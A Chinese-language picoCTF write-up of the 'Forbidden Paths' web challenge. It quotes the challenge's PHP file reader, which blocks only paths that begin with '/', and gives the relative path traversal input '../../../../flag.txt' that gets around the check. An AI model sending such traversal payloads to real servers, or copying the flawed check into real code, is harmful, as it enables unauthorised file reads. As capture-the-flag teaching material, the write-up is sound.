## 首頁(其他picoCTF writeup) https://hackmd.io/@sunfrancis12/ry_LLAgp3 作者: [台中教育大學 白帽社](https://hackmd.io/@ntcuhack/index) -sunfrancis12 ## Forbidden Paths 從題目敘述可知,這是一個path travsal題目 ![](https://hackmd.io/_uploads/SyVZoBiah.png) 進去網頁,查看原始碼 ![](https://hackmd.io/_uploads/SkMZCSj63.png) 原始碼如下: ``` <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="stylesheet" href="style.css"> <title>Web eReader</title> </head> <body> <h1>Web eReader</h1> <p>..</p> <p>divine-comedy.txt</p> <p>oliver-twist.txt</p> <p>the-happy-prince.txt</p> <form role="form" action="read.php" method="post"> <input type="text" name="filename" placeholder="Filename" required></br> <button type="submit" name="read">Read</button> </form> </body> </html> ``` 我們輸入`read.php`,試試看能不能讀檔 ![](https://hackmd.io/_uploads/SyIJCHoa3.png) `read.php`的內容如下: ``` <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="stylesheet" href="style.css"> <title>Web eReader</title> </head> <body> <!DOCTYPE html> <br><html lang="en"> <br> <head> <br> <meta charset="UTF-8"> <br> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <br> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <br> <link rel="stylesheet" href="style.css"> <br> <title>Web eReader</title> <br> </head> <br> <body> <br> <br> <?php <br> $firstChar = $_POST['filename'][0]; <br> <br> if( strcmp($firstChar, '/') == 0 ) <br> { <br> echo "Not Authorized"; <br> } <br> else <br> { <br> if (file_exists($_POST['filename'])) { <br> <br> $file = fopen($_POST['filename'], 'r'); <br> <br> while(! feof($file)) <br> { <br> $line = fgets($file); <br> echo $line. "<br>"; <br> } <br> <br> fclose($file); <br> } else { <br> echo "File does not exist"; <br> } <br> } <br> ?> <br> </body> <br></html> <br><br> </body> </html> ``` 看來`read.php`只有檢查POST的內容的第`0`個字元是否為`"/"` ``` $firstChar = $_POST['filename'][0]; if( strcmp($firstChar, '/') == 0 ){ echo "Not Authorized"; }else{ ..... } ``` 因此我們只要印出題目說的檔案位置就好,指令如下 ``` ../../../../flag.txt # ..是指回到上一層目錄 ``` ![](https://hackmd.io/_uploads/H1z0CHjp2.png)